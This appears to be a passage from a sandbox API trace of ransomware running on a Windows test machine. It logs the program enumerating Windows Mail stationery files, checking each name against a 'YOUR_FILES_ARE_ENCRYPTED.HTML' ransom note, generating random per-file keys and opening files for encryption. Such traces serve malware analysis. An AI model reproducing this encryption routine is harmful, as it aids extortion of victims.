ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8267651c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x432, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bears.jpg", cAlternateFileName="")) returned 1 [0163.759] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned 81 [0163.760] lstrcmpW (lpString1="Bears.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.760] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0163.760] lstrlenW (lpString=".jpg") returned 4 [0163.760] PathFindExtensionW (pszPath="Bears.jpg") returned=".jpg" [0163.760] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\bears.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.760] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=1074) returned 1 [0163.760] GetProcessHeap () returned 0x270000 [0163.760] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.761] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="15") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="AA") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="29") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="BF") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="AB") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="BD") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="FD") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="0C") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D4") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="B5") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="B1") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="A5") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="BB") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="EB") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="13") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="E1") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="97") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="FC") returned 2 [0163.761] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="AC") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="43") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="FE") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="93") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="9A") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="2B") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="84") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="7D") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="4C") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D8") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="96") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="AD") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="C5") returned 2 [0163.762] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="0B") returned 2 [0163.762] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Bears.jpg" [0163.762] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.763] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.766] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0xe21ca9ab, ftLastWriteTime.dwHighDateTime=0x1ca043e, nFileSizeHigh=0x0, nFileSizeLow=0x285, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop.ini", cAlternateFileName="")) returned 1 [0163.766] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Desktop.ini") returned 83 [0163.766] lstrcmpW (lpString1="Desktop.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.766] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0163.766] lstrlenW (lpString=".ini") returned 4 [0163.766] PathFindExtensionW (pszPath="Desktop.ini") returned=".ini" [0163.766] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd257f770, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd257f770, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41e73264, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xe7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.htm", cAlternateFileName="")) returned 1 [0163.766] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm") returned 82 [0163.767] lstrcmpW (lpString1="Garden.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.767] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0163.767] lstrlenW (lpString=".htm") returned 4 [0163.767] PathFindExtensionW (pszPath="Garden.htm") returned=".htm" [0163.767] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.767] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.775] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=231) returned 1 [0163.775] CloseHandle (hObject=0x5b8) returned 1 [0163.775] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x82780ebc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x5d3f, dwReserved0=0x0, dwReserved1=0x0, cFileName="Garden.jpg", cAlternateFileName="")) returned 1 [0163.775] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned 82 [0163.775] lstrcmpW (lpString1="Garden.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.775] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0163.775] lstrlenW (lpString=".jpg") returned 4 [0163.775] PathFindExtensionW (pszPath="Garden.jpg") returned=".jpg" [0163.775] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\garden.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.776] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=23871) returned 1 [0163.776] GetProcessHeap () returned 0x270000 [0163.776] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7422068 [0163.781] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="4E") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="D9") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="DB") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="91") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="69") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="D9") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="BF") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="CB") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D9") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="13") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="7A") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="B2") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="21") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="D0") returned 2 [0163.781] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="6D") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="7C") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="25") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="42") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="E7") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="90") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="06") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="59") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="2D") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="E2") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="F9") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="41") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="F3") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="29") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="15") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="F5") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="30") returned 2 [0163.782] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="66") returned 2 [0163.783] lstrcpyW (in: lpString1=0x743211c, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Garden.jpg" [0163.783] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x7422068, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.783] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7422068, lpOverlapped=0x7422068) returned 1 [0163.783] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41ebf524, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Green Bubbles.htm", cAlternateFileName="GREENB~1.HTM")) returned 1 [0163.783] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm") returned 89 [0163.783] lstrcmpW (lpString1="Green Bubbles.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.783] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0163.783] lstrlenW (lpString=".htm") returned 4 [0163.783] PathFindExtensionW (pszPath="Green Bubbles.htm") returned=".htm" [0163.783] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.783] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Green Bubbles.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.784] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=237) returned 1 [0163.784] CloseHandle (hObject=0x594) returned 1 [0163.784] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827cd17c, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x1906, dwReserved0=0x0, dwReserved1=0x0, cFileName="GreenBubbles.jpg", cAlternateFileName="GREENB~1.JPG")) returned 1 [0163.784] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned 88 [0163.784] lstrcmpW (lpString1="GreenBubbles.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.784] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0163.784] lstrlenW (lpString=".jpg") returned 4 [0163.784] PathFindExtensionW (pszPath="GreenBubbles.jpg") returned=".jpg" [0163.784] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\greenbubbles.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.784] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=6406) returned 1 [0163.784] GetProcessHeap () returned 0x270000 [0163.784] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x744a1c0 [0163.787] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C3") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="CC") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="18") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="93") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="BB") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="11") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="04") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="43") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="A0") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="77") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="BF") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="F8") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="23") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="72") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="83") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="01") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="42") returned 2 [0163.787] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="8F") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="28") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="78") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="00") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="A8") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="49") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="EF") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="38") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="63") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="B0") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D6") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="54") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="F6") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="8D") returned 2 [0163.788] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="78") returned 2 [0163.789] lstrcpyW (in: lpString1=0x745a274, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\GreenBubbles.jpg" [0163.789] CreateIoCompletionPort (FileHandle=0x594, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.789] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0163.789] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x41f0b7e4, ftLastWriteTime.dwHighDateTime=0x1ca0409, nFileSizeHigh=0x0, nFileSizeLow=0xeb, dwReserved0=0x0, dwReserved1=0x0, cFileName="Hand Prints.htm", cAlternateFileName="HANDPR~1.HTM")) returned 1 [0163.789] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm") returned 87 [0163.789] lstrcmpW (lpString1="Hand Prints.htm", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.789] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0163.789] lstrlenW (lpString=".htm") returned 4 [0163.789] PathFindExtensionW (pszPath="Hand Prints.htm") returned=".htm" [0163.789] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.789] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Hand Prints.htm" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\hand prints.htm"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0163.789] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=235) returned 1 [0163.789] CloseHandle (hObject=0x5b0) returned 1 [0163.789] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd24e71f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd24e71f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x827f32dc, ftLastWriteTime.dwHighDateTime=0x1c9ea12, nFileSizeHigh=0x0, nFileSizeLow=0x107e, dwReserved0=0x0, dwReserved1=0x0, cFileName="HandPrints.jpg", cAlternateFileName="HANDPR~1.JPG")) returned 1 [0163.789] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg") returned 86 [0163.790] lstrcmpW (lpString1="HandPrints.jpg", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.790] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0163.790] lstrlenW (lpString=".jpg") returned 4 [0163.790] PathFindExtensionW (pszPath="HandPrints.jpg") returned=".jpg" [0163.790] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.790] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\HandPrints.jpg" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows mail\\stationery\\handprints.jpg"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b0 [0163.790] GetFileSizeEx (in: hFile=0x5b0, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=4222) returned 1 [0163.790] GetProcessHeap () returned 0x270000 [0163.790] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0163.792] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="3E") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="7E") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="CE") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="F8") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="89") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="0A") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="E3") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="8C") returned 2 [0163.792] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="D6") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="56") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="08") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="64") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="B1") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="32") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="0B") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="D9") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="C2") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="09") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="8C") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="DC") returned 2 [0163.793] wsprintfW (in: param_1=0x4ebd162, 